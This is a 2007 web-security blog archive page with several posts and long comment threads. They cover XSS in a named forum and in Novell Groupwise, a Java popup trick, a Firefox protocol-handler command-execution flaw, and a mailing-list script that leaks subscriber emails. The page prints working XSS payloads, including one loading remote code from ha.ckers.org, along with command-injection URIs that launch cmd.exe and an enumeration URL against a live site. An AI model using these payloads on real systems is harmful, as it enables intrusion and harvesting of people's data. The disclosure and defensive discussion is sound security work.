Serving 416729 hackers, 70.84 GB since 2006 - last 10K referers  
ARTICLES     ARCHIVE    ABOUT    FEED

Advertisements



Browser Hacks
Reconnaissance
SQL Injection
CSRF
News
Security
Root
Code snippets
XSS Cross Site Scripting
Interviews
Phishing
Spam
Fun

Attacking The Attackers.

Posted on 30 07 07 - permalink


Stefan Esser from hardened-php talks about a flaw in one of gnucitizen's programs online that facilitated XSS. Now I got one for Stefan himself, and this is likely more problematic. Because, what would you say, when you are top PHP security expert and are vulnerable to such basic exploit like this below? shit happens, and the fact is most website are vulnerable. To be 99,99% secure requires a vigilant mind and constant auditing, because these things can be prevented:

http://forum.hardened-php.net/viewforum.php/%22%3E%3CBODY%20ONLOAD=alert('XSS')%3E


christ1an on 30.07.2007 said:
Well, thats obviously a vulnerability within PunBB. Blaming Stefan for this issue doesn't make any sense in my eyes. But it seems I'm thinking differently about this topic in general.
0x000000 on 30.07.2007 said:
I waited to see who came first with that comment, because it is and it isn't. It's both the software but also how PHP handles this input. It is a PHP issue, and not many people know about this. It's easy to blame it on the forum software, especially if you promote: "php hardening" because this proves they don't even run it themselfs. If your properly sanitize anything this won't happen. I think it's time to cut the bullshit and say that this is a reality, anyone speaking about webapplication security must be sure this never happens. Otherwise you picked the wrong career.
bane on 30.07.2007 said:
isn't pdps tool meant to be used for attacks and the stefans vuln is just in a forum he didn't code? although I see your point: calling the article "attacking the attacker" looks very retarded to me.
Gareth Heyes on 30.07.2007 said:
Interesting exploit Ronald, is it the failure to sanitise PHP_SELF that causes this problem?
christ1an on 30.07.2007 said:
Ronald, why do you think this is a PHP flaw? Thats insufficient output filtering in the PunBB source code. Nothing else. No chance for consumers to properly protect against such issues except for not using the product.
0x000000 on 30.07.2007 said:
I can go even further by saying that anyone who uses blog software like WordPress or other blog software is in danger and should shut up talking about other peoples problems while they have holes themselfs. I can say that, because it's true. I won't make a lot of friends this way, but that's not my game. It's about time we had a discussion about this and face some truths here, because too many people seem to hide behind "other peoples software".

Here is the latest WP exploit, fresh of the press: http://www.milw0rm.com/exploits/4113

Have fun!
Stefan Esser on 30.07.2007 said:
Haha, I really waited for something like this to happen. A lame attempt to blame me.

And it is exactly the point. What you exploited is the vulnerability in the forum software installed.
Mabye multiple 100 lines of code, not written by myself.

The CSRF tools on the other hand are most probably only a few lines of code, written by people into web application security.

BTW: The fact that PHP_SELF might contain user input has nothing todo with PHP hardening. It is a flaw in an application not in PHP.
0x000000 on 30.07.2007 said:
@Gareth

it could be any of these: $_SERVER['PATH_INFO'] , $_SERVER['PHP_SELF'], $_SERVER['QUERY_STRING'] etc... it depends. Server variables need to be sanitized, it's not input alone.
Stefan Esser on 30.07.2007 said:
Server Variables that contain URLs are of course INPUT.
0x000000 on 30.07.2007 said:
Yeah you waited alright, waited a long time didn't you. While you waited you didn't find it necessary to sanitize a few server vars. Blame it on the moon, blame it on me now. Fact is: it sucks.
pdp on 30.07.2007 said:
congrats guys, you found an issues in our POCs. Great job :) I will go to milw0rm and start exploiting the exploits. Let's call it the Month of Exploits Bugs :)
.mario on 30.07.2007 said:
Hi!

I am so sick of this whole discussion - what did it start with? Chris' CRSF mini-tool? Can't we just try to extract the few usable conclusions off this kindergarten-talk and start acting like grown-ups again?

- mistakes happen
- usage of 3rd party software w/o own auto_prepend_file filtering is a no go
- vulture-like acting and the whole drama-queening is of NO use. for no one.
- quit acting like you are filled up with useless hate. if you really are - quit acting

If anyone has a bug in one of his apps write him/her a mail, maybe create a post to show others and be cool with it.

Cheers,
.mario
0x000000 on 30.07.2007 said:
Like I said: most sites are vulnerable to this, it isn't limited to Stefan's forum (punbb). But I felt the need to point this out because it's easy to point at other people's code while not being fully safe yourself. That is thin ice to walk upon, and that is what I wanted to say. Especially if you are expert in PHP security: you would prevent this by all means.

Well I think the software Ed Finkler and Chris Shiflett are developing: "Inspekt" is a proper way of handling environment variables by encapsulating them all first, detroying the superglobal and then sanitize them. It can be a measure against the kind of vectors if you don't want to modify current code:

http://code.google.com/p/inspekt/

So there are solutions, both at server level as well in code.
christ1an on 30.07.2007 said:
Stefan you are an **** :-D http://www.0x000000.com/index.php?i=322 (comments)
.mario on 30.07.2007 said:
@Stefan & christ1an: Haha... very cool ;)
Gareth Heyes on 30.07.2007 said:
These bugs shouldn't exist in software but anything placed on the internet shouldn't be able to be exploited. We should have systems in place to detect and prevent such exploits. I agree with Ronald about using software which hasn't been developed by the person using it, I myself am guilty of this but we don't all have time to write every piece of software ourselves that's why I have decide to produce a IDS system which will prevent these sort of attacks on my systems.

I think it is good for the security community to expose flaws in tools written by security professionals or even find holes in software used by them. After all that is what security research is about, if someone found a flaw in a tool I had written then great, as far as I'm concerned it's more learning material to find out were I went wrong.

It is funny when someone writes a tool that contains a basic error after blogging about how dangerous XSS or CSRF is. Maybe it's not funny to people who have corporate interests but hey I don't care really, I like security from a technical point of view and my passion is learning not my bank balance.
0x000000 on 30.07.2007 said:
@Stefan, Christian, Mario:

So? those are just links. I allow them, it's the surfers choice to click them.
Stefan Esser on 30.07.2007 said:
@christ1an

Well such basic exploits work on Ronalds site... The software is written by himself?
christ1an on 30.07.2007 said:
No Ronald, sorry but that last statement just doesn't fit to you. I dare to claim to know you better.
0x000000 on 30.07.2007 said:
So what can you with them? try to launch an exploit with it, I'll wait.
Stefan Esser on 30.07.2007 said:
@christ1an

Ping...
christ1an on 30.07.2007 said:
Ronald, I'll certainly explain that to you. But lets do that in private okay?
0x000000 on 30.07.2007 said:
Oh no, show it here. I have nothing to hide.

Let's recap the base64 encoded data uri: what's wrong with that? It one of the most used exploits on hyper links, but only if nothing else works anymore. And it requires user interaction to click on it. Since it got a size limitation, there's nothing you can launch with it. You think I would allow it when you can launch anything with it? You still don't know me yet.
Stefan Esser on 30.07.2007 said:
@christ1an

The amusing thing is: he claims that it is a no issue and at the same time he has added a filter in the background to catch it....
0x000000 on 30.07.2007 said:
No I did not Stefan, what did I filter differently? It has only various rules and they can change depending on what you enter.
christ1an on 30.07.2007 said:
Stefan, I guess you're wrong here. What you notices is just some cookie weirdness.

Anyway Ronald, what stops me from executing arbitrary (also in the length) malicious javascript (which results in what we all call XSS) using the base64 vector? You should know that I don't state what I can't proof.
Gareth Heyes on 30.07.2007 said:
@Christ1an don't you still have to click the link? I think that's Ronald's point
Gareth Heyes on 30.07.2007 said:
You shouldn't be able to a link with the javascript protocol on this site but lets face it who here is gonna click it? If they do then I think they've found the wrong site to browse.
0x000000 on 30.07.2007 said:

I only added a few IP blocks, that's all. I just consider this spam and nothing else, and spam gets blocked. If you don't like it go fuck yourself with your lame vectors and edit some Wikis for a living, they do nothing at all. Y'all totally missed the message I was trying to spread. Instead you try to "inject" a hyperlink, and you fail to launch a sensible attack. Y'all think you are there yet, that you guys understand it all. Go take a good look in the mirror my friends,

Pathetic.
pdp on 30.07.2007 said:
christ1an, I just want to add to the whole conversation since I find it very amusing and it just makes my day. What stops me from changing some of the GC images, aggregated by planet-websecurity, to revert to CSRF exploits that could compromise your home router? We all know that hot-linking is dangerous, do we?
Doc? on 30.07.2007 said:
Hey McFly... Chicken, McFly!
Nobody... calls me... chicken.

(this is not spam)

http://img413.imageshack.us/img413/8083/circuitscl8.gif
http://mena.typepad.com/photos/uncategorized/biff.jpg
Name:

Uri:

Comment:

HTML is being converted, so you can post code. note: commenting requires Cookies & Javascript to be enabled.


Novel Groupwise Webaccess XSS

Posted on 29 07 07 - permalink


Someone send his referer pointing out he uses Novel. I won't tell who, but I do found out that it's vulnerable to XSS. The vulnerable application was Novel Groupwise Webaccess Version 6.5. Novel does filter upon XSS but they make the obvious mistake of replacing instances of <script with <!-- and: <!. If you are quick you can see who it was in my referer list in the top right. I put this page up to show people that it is a bad idea to send your referer along, I hope it helps.

/servlet/webacc?User.Id="><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE><"



Name:

Uri:

Comment:

HTML is being converted, so you can post code. note: commenting requires Cookies & Javascript to be enabled.


Java Popups.

Posted on 29 07 07 - permalink


Well, in Firefox at least. I hope i'm doing the right thing here, because I know what it felt like to live with popups for a couple of years when browsers didn't block them by default. You can launch popups in Firefox without the users permission. The browser supports it through the Java class LiveConnect. This is a feature I researched in my spare time lately. Okay, so now we are going to launch a popup with it: /hacks/javapopup/

<script>
function newpopup() {
var p = new java.awt.Frame("My Crappy Popup");
with (p)
{
stuff = new java.awt.TextArea("My crappy corporate message with annoying products which no one buys!", 10,100);
setLayout(new java.awt.BorderLayout());
p.add("Center", stuff);
p.pack();
p.show();
p.setLocation(200,200);
p.setVisible(true);
}
}
</script>


B.D. on 29.07.2007 said:
Nice. I tried this on my Ubuntu machine (Java's enabled) and got nothing, but that may be because I have Java misconfigured.
0x000000 on 29.07.2007 said:
Yes I only tested it only WinXP. But it is a feature in Firefox, so no real voodoo here besiside the joy of seeing a popup again ^^
tr3intaydos on 29.07.2007 said:
I also tried in Ubuntu, but i got nothing, too.
Ryan on 29.07.2007 said:
it works for me, on windows xp. i can't even close the pop up, either, without closing the browser window.
christ1an on 29.07.2007 said:
Thats kind of a dossing effect on my side too. Had to close everything with MS task manager.
0x000000 on 29.07.2007 said:
Haha yes I had the same results, I didn't say that sorry! ^^. another reasons why I don't like Java. It would be cool to figure out how to load a full webpage in it. I haven't tryed that yet. Interestingly is that it fails on Ubuntu...
Davide Denicolo on 29.07.2007 said:
Ryan it's true. My environment is Windows 2000 + Firefox 2.0.0.5 and for me too it isn't possible to close java popup without closing the browser. In my task manager is visible ad icon of Java but if you try to close it you'll close the entire browser
Giorgio Maone on 29.07.2007 said:
Nice :)
I guess you can do the same even in other browsers using an Applet, but Firefox has this "handy" integration between JavaScript and Java which makes this thing look more dramatic.
The window can't be closed using its "X" button because Ronald's code doesn't handle the WINDOW_CLOSE event (this adds further drama).
At any rate, you can always close it using the following bookmarklet:

javascript:(function() { var ff=java.awt.Frame.getFrames();for(var j = ff.length; j-- > 0;) ff[j].dispose(); })()

--
There's a browser safer than Firefox... http://noscript.net
humble on 29.07.2007 said:
can Flash do popups? Might work cleaner & in more places?
Name:

Uri:

Comment:

HTML is being converted, so you can post code. note: commenting requires Cookies & Javascript to be enabled.


Time May Not Exist.

Posted on 28 07 07 - permalink


Very off topic today, but I like science and philosophy so here it goes:

I don't believe in time as a reality or real thing, time is only a convention. A bunch of people agreed on that convention because it made stuff easier, just like inches and pounds are conventions. But it isn't real as in real. It's as real as a fragment of our imagination. Think about it, what is time? the reason Buddhists say: "live in the present, that is all you can do" is so true, because there only is a present. Every moment is the present, a moment ago it was the present and when you finish reading this text, it will be the present again, defining past and future is only fragmenting it and basically unnecessary to it's fundamental concept.

I got inspired by this piece of text below, it clearly says what I felt for a long time, As the Buddhists might say: It's all right here, and right now.

No one keeps track of time better than Ferenc Krausz. In his lab at the Max Planck Institute of Quantum Optics in Garching, Germany, he has clocked the shortest time intervals ever observed. Krausz uses ultraviolet laser pulses to track the absurdly brief quantum leaps of electrons within atoms. The events he probes last for about 100 attoseconds, or 100 quintillionths of a second. For a little perspective, 100 attoseconds is to one second as a second is to 300 million years.

Efforts to understand time below the Planck scale have led to an exceedingly strange juncture in physics. The problem, in brief, is that time may not exist at the most fundamental level of physical reality. If so, then what is time? And why is it so obviously and tyrannically omnipresent in our own experience? "The meaning of time has become terribly problematic in contemporary physics," says Simon Saunders, a philosopher of physics at the University of Oxford. "The situation is so uncomfortable that by far the best thing to do is declare oneself an agnostic."

http://discovermagazine.com/2007/jun/in-no-time

Gareth Heyes on 28.07.2007 said:
I think time is the universe expanding like a roll of film unwinding...I think it's time I went to bed lol :)
David on 28.07.2007 said:
Typical, blame it on God when you don't understand something :)
STFU on 28.07.2007 said:
Time is an idea, like pizza and math. It is us defining a special construct of something, as something more than just what it is made of. Measuring time is essentially just comparing the movement speed of different things. Without the sun, the moon and watches we would have to reinvent time, or at least redefine it. If everything stopped moving, time would make no sense. IMO
0x000000 on 29.07.2007 said:
Yep, it's weird stuff. Sometimes it's good to think about such things, it can change perspective.
Joshua May on 30.07.2007 said:
I've long been opposed to time in a large way.

The analogy I like to think of is that 'time' is often thought of as a movie reel - with frames coming, and frames in the past. I'd like to think of it more that the reel has stopped, as we're living our life on a single frame. But, that frame is somehow animated.

Though, relativity shoots down a lot of my beliefs around time, so I kinda gave up.
Name:

Uri:

Comment:

HTML is being converted, so you can post code. note: commenting requires Cookies & Javascript to be enabled.


Flash Player Vuln.

Posted on 28 07 07 - permalink


This almost got buried in the feeds I read. But, I want to point out that this is a serious issue. So if you haven't heard it yet, Go take a look at the specs and a video explaining it all on gnucitizen:

http://www.gnucitizen.org/blog/bid-24856-flash-player-swf-vulnerability

Name:

Uri:

Comment:

HTML is being converted, so you can post code. note: commenting requires Cookies & Javascript to be enabled.


Wikipwndia.

Posted on 28 07 07 - permalink


From day one I hate that name: Wikipedia. It's a meta language demon that is haunting me in my dreams, they abuse URI's and have those horrible names for everything. Moreover they suck at being cool and they've become one big pulp archive listing every dumb thing known to man. I wrote about it before, they think it's okay to have XSS and SQL injection, I won't throw it up again but it's quite true. So if they don't care, I have few next. Let's see how quickly those are going to be patched ^^ Am I evil? No I'm not, I only wanna have some fun is that a crime?

Why it's bad to echo back the PHPSESSID:
http://www.0x000000.com/hacks/wikipedia/session_modification.jpg

Look mom! html injection:
http://www.0x000000.com/hacks/wikipedia/injection.jpg



2stoned3 on 28.07.2007 said:
nice one X)
christ1an on 28.07.2007 said:
Wikipedia developers may be dumb. There may be some articles that are even worse than others. But the main idea behind Wikipedia, the goal the initiative is striving, is - and thats a fact - great and some sort of revolutionary also.

Proof? Simple. I use Wikipedia on a daily basis to look up what I'm after. Am I dumb for doing so?
So Ronald, blame the devs as much as you want, I'm sure they deserve it. Actually, a lot of dev teams do. But do not blame the initiative itself.
0x000000 on 29.07.2007 said:
Yeah it was a joke, kinda sweet they have a vulnerable wap browser.
Name:

Uri:

Comment:

HTML is being converted, so you can post code. note: commenting requires Cookies & Javascript to be enabled.


Javascript Router Scanner

Posted on 27 07 07 - permalink


I'm filing this under reconnaissance, because this is another router scanner. I knew about a few, and I even wrote one myself. But I never found time to make a good one, Gareth e-mailed me his updated version today and you know what? It's pretty devilish good. You can even contribute in refining it by submitting your router information to him. It can detect a dozen already, but if you want to help you get something in return. As an incentive in helping out, the database will be released under a GPL license when it's completed. So what are you waiting for?

Sneaking through, null scanning your router like a thief in the night, snipers armed and ready: Javascript here we come!

http://www.businessinfo.co.uk/labs/nat_scan/nat_scan.php



Name:

Uri:

Comment:

HTML is being converted, so you can post code. note: commenting requires Cookies & Javascript to be enabled.


Cenzic Email Blacklist.

Posted on 26 07 07 - permalink


This is kinda sweet, I was looking for the Cenzic site and noticed they have a Javascript blacklist containing a couple of email addresses that obviously requested too much Hailstorm trials. And, haha... among them I saw Acunetix that was being blocked. I nearly rolled of my chair from laughing, do they just hate eachother so much? Look at the list below it's hilarious, sorry Cenzic I thought this was funny. ^^

Oh and they made a typo on "acuntetix.com" and I saw watchfire, spidynamics in it as well.

blacklist = new Array("@138mail.com",
"@acuntetix.com","@address.com","@animail.net","@aol.com","@asiamail.com","@aussiemail.com.au",
"@bluebottle.com","@boardermail.com","@bolt.com","@bordermail.com","@canada.com","@canoemail.com",
"@cashette.com","@cashette.com","@catchamail.com","@centralpets.com","@collegeclub.com","@coolgoose.com",
"@dbzmail.com","@dcemail.com","@didamail.com","@doneasy.com","@doramail.com","@emailaccount.com","@eml.cc",
"@fastemailer.com","@fastermail.com","@fastmail.ca","@fastmail.fm","@fastmail.fm","@flashmail.com",
"@GabCity.com","@gawab.com","@Gmail.com","@go.com","@goowy.com","@graffiti.net","@Hotmail.com",
"@hotmail.com","@hush.ai","@hush.com","@hushmail.com","@icqmail.com","@incamail.com","@indiatimes.com", "@kittymail.com","@koreanmail.com","@letterbox.org","@linuxmail.org","@lpemail.com","@lycos.com",
"@mail2world.com","@mailasia.com","@mailblocks.com","@mailpanda.com","@mantramail.com","@marchmail.com",
"@moose-mail.com","@myfastmail.com","@mypersonalemail.com","@myway.com","@netscape.com","@netster.com",
"@online.ie","@operamail.com","@orcon.net.nz","@outgun.com","@postmaster.co.uk","@prontomail.com",
"@recipemail.com","@recyclermail.com","@rediffmail.com","@rock.com","@romymichele.com","@sacmail.com",
"@safe-mail.net","@sandiego.com","@scalix.com","@shadango.com","@snail-mail.net","@spidynamics.com",
"@stalag13.com","@surfy.net","@themail.com","@tidni.com","@tmicha.net","@ureach.com","@uymail.com",
"@vfemail.net","@virtual-mail.com","@vorras.net","@wapicode.com","@watchfire.com","@weekonline.com",
"@whale-mail.com","@wildmail.com","@x-mail.net","@xu.alumlink.com","@yahoo.ca","@Yahoo.com",
"@yahoo.com","@yyhmail.com");


blad3 on 26.07.2007 said:
They also have Watchfire listed there.
That's funny, we never requested a trial from Cenzic.
BTW, it's Acunetix not acuntetix :)
blad3 on 26.07.2007 said:
Is funny they are doing validation on client side.
nEUrOO on 26.07.2007 said:
Cenzic is everytime really funny... But Gmail/Yahoo... isn't it stupid to blacklist this?
LordSephiroth on 26.07.2007 said:
Bad Watchfire, Bad! ;p

This reminds me of an app we had to test a few months ago. They did all their validation and filtering client side, we found some 14 SQL injections in under an hour. Whats worse, it was a security compliance application. Boo. You'd think companies like Cenzic would know better than to do something like this though.
0x000000 on 26.07.2007 said:
Yeah, double fun. Sometimes you must find such stuff otherwise you go crazy in this field. :)
.mario on 27.07.2007 said:
A Javascript blacklist... wow. Needless to say more. Better would have been a blacklist which you have to print out before using.
agente_naranja on 27.07.2007 said:
So it seems that basicly they don't want anyone to write to them.
nEUrOO on 27.07.2007 said:
Well, maybe it's not a big deal for them :P
0x000000 on 29.07.2007 said:
Yeah I guess so :)
Name:

Uri:

Comment:

HTML is being converted, so you can post code. note: commenting requires Cookies & Javascript to be enabled.


Unsubscribing And Collecting Email Addresses.

Posted on 25 07 07 - permalink


Collecting email addresses, how hard is it? Today I unsubscribed myself from a writers mailinglist, then I saw how they unsubcribed me. I was send to a perl script. And oh yeah, I could not resist to tamper. It is some sort of perl maillist script that is easily owned, it's almost too simple. The script is called Arp3 and can be Googled with inurl:arp3-un.pl

Check out the link below, I googled this one next. Change the first parameter c=5072 and see different addresses show up each time you increment it. You can collect them all and unsubcribe them at the same time. All you need is to write a small script that enumerates through it. I'm not sure what that second parameter is doing. Anyway, shame on them i'dd say.

http://www.ezinepriority.com/cgi-bin/arp3/arp3-un.pl?c=5072&p=0734

LordSephiroth on 25.07.2007 said:
I ran across a similar script a few weeks ago, I don't think it was arp3 though.

It was for a regional IT news list of some sort and my dad forwarded me one of their messages, which obviously had the 'Unsubscribe from here using this' link. I tinkered for a minute or two and ended up unsubscribing him. Pretty pisspoor considering their service requires a monthly fee.
john doe on 26.07.2007 said:
this is really sad, i can't believe people are still developing this way
Awesome AnDrEw on 27.07.2007 said:
Delicious! I've found similar issues in services such as PhotoBucket where variables are not random, or hashed in any way, but simply follow a pattern of using character increments.
Name:

Uri:

Comment:

HTML is being converted, so you can post code. note: commenting requires Cookies & Javascript to be enabled.


Firefox Remote Code Execution.

Posted on 25 07 07 - permalink


This is where nightmares are made of.

As some of you know there has been a ton of commotion going on about Mozilla Firefox lately. I've waited blogging about it until they had found a real 0day. Today is that day and this time it's for real, Billy Rios e-mailed me his new findings: and anyone could be vulnerable without any user interaction. It's not complicated shellcode execution, but it allows to pass arguments along cmd in windows to launch software among other things.

The first versions required user interaction so I was a bit skeptic, because asking users twice to launch a program is a little far fetched for me. What they did was passing arguments along a command line, which is basic stuff to understand. But this is different, this hurts everyone. I made the switch to Opera last month, and I can't say I regret now.

Example of compromised identifiers:


mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

nntp:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

news:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

snews:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

http://xs-sniper.com/blog/remote-command-exec-firefox-2005/

Darkdata on 25.07.2007 said:
stupid javascript comments, in my day we were friendly...

Anyway:
network.protocol-handler.warn-external.(mailto|nntp|news|snews|etc)
true, you get a pop up asking if youw ant to run bla, and a link to the url.
I have no idea if javascript can override this...

(It ate my good post, so lazyness away!)
digi7al64 on 25.07.2007 said:
... and everybody laughed at me when i said i was going to telnet so i could be secure!
Giorgio Maone on 25.07.2007 said:
You may want to add that the relevant bug ( https://bugzilla.mozilla.org/show_bug.cgi?id=389106 ) has been fixed 2 days ago.
This means that already available Minefield builds and Firefox 2.0.0.6 release candidates are immune.

Furthermore, NoScript 1.1.6.06 (released yesterday) gives early protection against this exploit for those stuck with stable 2.0.0.5.

OT: I agree with Darkdata... you're a brilliant guy: why can't you come with an anti-spam system which doesn't requires JavaScript? Or at least explain why JS makes your system so better than the scriptless ones?
--
There's a browser safer than Firefox... http://noscript.net
Darkdata on 25.07.2007 said:
I have 1.1.6.06 version of no script, and the exploit still worked. (tested on http://xs-sniper.com/blog/remote-command-exec-firefox-2005/) when I was looking at about:config for a workaround. Javascript was disabled on that site, and it had no parts whitelisted.

Also, I can see why he uses Javascript, not very many bots will be able to post if it requires it.
0x000000 on 25.07.2007 said:
Thanks for the info, it's great that someone is working on it.

Oh yes, but this example just shows that it doesn't matter if you have Javascript on or off. I don't believe in turning it of fully, it would break a ton of things that are useful. in this case I set PHP generated cookies through Javascript, figuring you need a Javascript capable browser to obtain a cookie.
Dan Veditz on 25.07.2007 said:
If you paste those urls into the "Run" box on the Windows start menu you get exactly the same behavior, no Firefox involved. In the Run box "http:" and "ftp:" will work too. Interestingly, if you change the scheme to "testurl" it will run the testurl handler and pass the URL as you'd expect and not do this special-cased behavior.
Giorgio Maone on 25.07.2007 said:
@Darkdata:
Could you tell me exactly which exploit did work?
NoScript implements the very same fix that has been landed on the Mozilla tree and will be deployed with 2.0.0.6, i.e. it forces percent-encoding of spaces and double quotes in outgoing URLs.
The telnet "0 day", for instance, just opens a prompt with
Telnet: connecting to windows/system32/calc.exe%20%22%20-%20%22%20blah.bat...

@0x000000:
You seem still under the impression NoScript is just about JavaScript blocking, forgetting the additional protection layers it provides, for instance:
1. Anti-XSS filters
2. Injection Detection
3. Plugin content blocking
4. Top-level window protection (e.g. against chrome privilege escalation like the first firefoxurl exploit wave)
5. Other minor tweaks scattered through the request processing flow, like the one preventing the exploit we're talking about now

Soon to be released: Mashup Manager (an anti-CSRF counter-measure)
Darkdata on 25.07.2007 said:
The telnet 0 day did not work, however mailto|nntp|news|snews 0 day did. I have no idea why...

Hmm, the only difference seems to be that telnet pops open a new window, and the others do not...

Ah, I just opened one of the other explots in a new tab (mailto), it seems that it does not work when I do that.

Hmm, odd.

Ah, and 0x000000, I hope you don't mind this piggybacking of your comment system.. >_<
Darkdata on 25.07.2007 said:
Just doublechecked, it is only encoding when opened in a new tab.
Bleh, I hate double posting, even when there is no edit.
Giorgio Maone on 25.07.2007 said:
@Darkdata:
many thanks for your precious followup.
I still cannot reproduce, but I can see how it may happen with mailto: depending of what external handler is configured, since mailto: handling seems to take a path of his own (BTW, you can disable it through about:config, network.protocol-handler.external.mailto).
Can you confirm it does the same with news and the others aside telnet?
Which application(s), if any, have you got configured for those protocols?
Thanks again
--
There's a browser safer than Firefox... http://noscript.net
0x000000 on 25.07.2007 said:
@Dan Veditz

What I never understand is that encoded nulls are allowed in URI's, I understand that handling the URI is a huge problem in browsers because so much is allowed, but why not silently fail to open resources that contain at least encoded nulls, combinations of spaces and nulls? I never saw any HTML instance where one needed to include a URI like telnet:// inside and iframe. MSIE has dropped telnet:// and gopher support, which I think is clever, but it would be better to deny access to it by default and only turn it on inside a few settings.

Secondly after seeing the res:// abuse in MSIE7 why not disallowing all file access by default and only upon strict request in settings, the principle of least privilege? I really like to see browsers that do what they are intended for: browsing the web, not my file system.

@Giorgio
I knew about that, but it generated tons of false positives/negatives for me, I know it's a good extension for many but let's not make this a NoScript blog shall we? ^^

@Darkdata
haha yes, well I can handle a little critics.
Giorgio Maone on 25.07.2007 said:
@Darkdata:
Can you repeat your tests with 1.1.6.07 ( http://noscript.net/getit#direct ) ?
It should handle the "special" mail/news case as well, independently from client configuration.

@0x000000:
Sorry, I thought NS was quite on-topic since it features specific protection against this very exploit.
Nevertheless, I'd like you to retry now that all the rough edges in Anti-XSS protection have been smoothed, and I'd appreciate very much your hints if you still found any false positive :)
Mesut EREN on 25.07.2007 said:
Hi,
i tested vulnerability on 2.0.0.5 but don't working..

example code ise
<A HREF="mailto:%00%00../../../../../../windows/system32/cmd">
this code is correct.?
0x000000 on 25.07.2007 said:
I will install it again, it's been a while. Of course I still run Firefox, it's my developer machine. ^^ I can't call that a browser anymore, it's more a platform these days.

And like Billy also said on slackers, this isn't limited to Firefox alone, I knew about a couple or resource identifiers that could be used to launch a CSRF for a long time like: telnet:// which was mere playful. But it seems it has gotten far worse. Because this is what it eventually is: CSRF on application level, a real demon that is tough to destroy.
Casidiablo on 25.07.2007 said:
I tested vulnerability on 2.0.0.5 but don't working..

example code ise

<a href='mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat'>clic</a>

this code is correct.?
Jordan on 25.07.2007 said:
Grr.. even after all the comments and knowing better, I posted a comment w/o javascript and lost it. *sigh*. Anyway, short summary. The exploit only works if IE7 is installed. I have no idea why at this point, but I'm positive. I've tested it multiple times now. I took a freshly built SP2 image, added patches in groups until I had installed everything except IE7, and the Firefox vuln was /not/ working. As soon as I installed IE 7, the exploit succeeded. I'm not blaming anybody at this point since I don't know the exact mechanism, but it's pretty darn funny with all the back and forth going on between IE and FF over these issues.
ascii on 26.07.2007 said:
Since I'm a bit bored by all these external protocol handler vulnerabilities:

http://www.ush.it/2007/07/25/clientside-security-hardening-mozilla-firefox/

Hope you will enjoy.
LordSephiroth on 26.07.2007 said:
This just proves that you need to unregister any URI handlers that you aren't using. They have been a source of a number of problems ranging from stack overflows to command executions (like this case).

http://www.google.com/search?source=ig&hl=en&q=%22uri+handler%22+site%3Asecunia.com
0x000000 on 26.07.2007 said:
if it was me who created browsers, I turned of any external identifier other then ftp & http/https for normal surfers, and let it switch back on in some settings for the developers and people who need the rest. But that's me :)
Name:

Uri:

Comment:

HTML is being converted, so you can post code. note: commenting requires Cookies & Javascript to be enabled.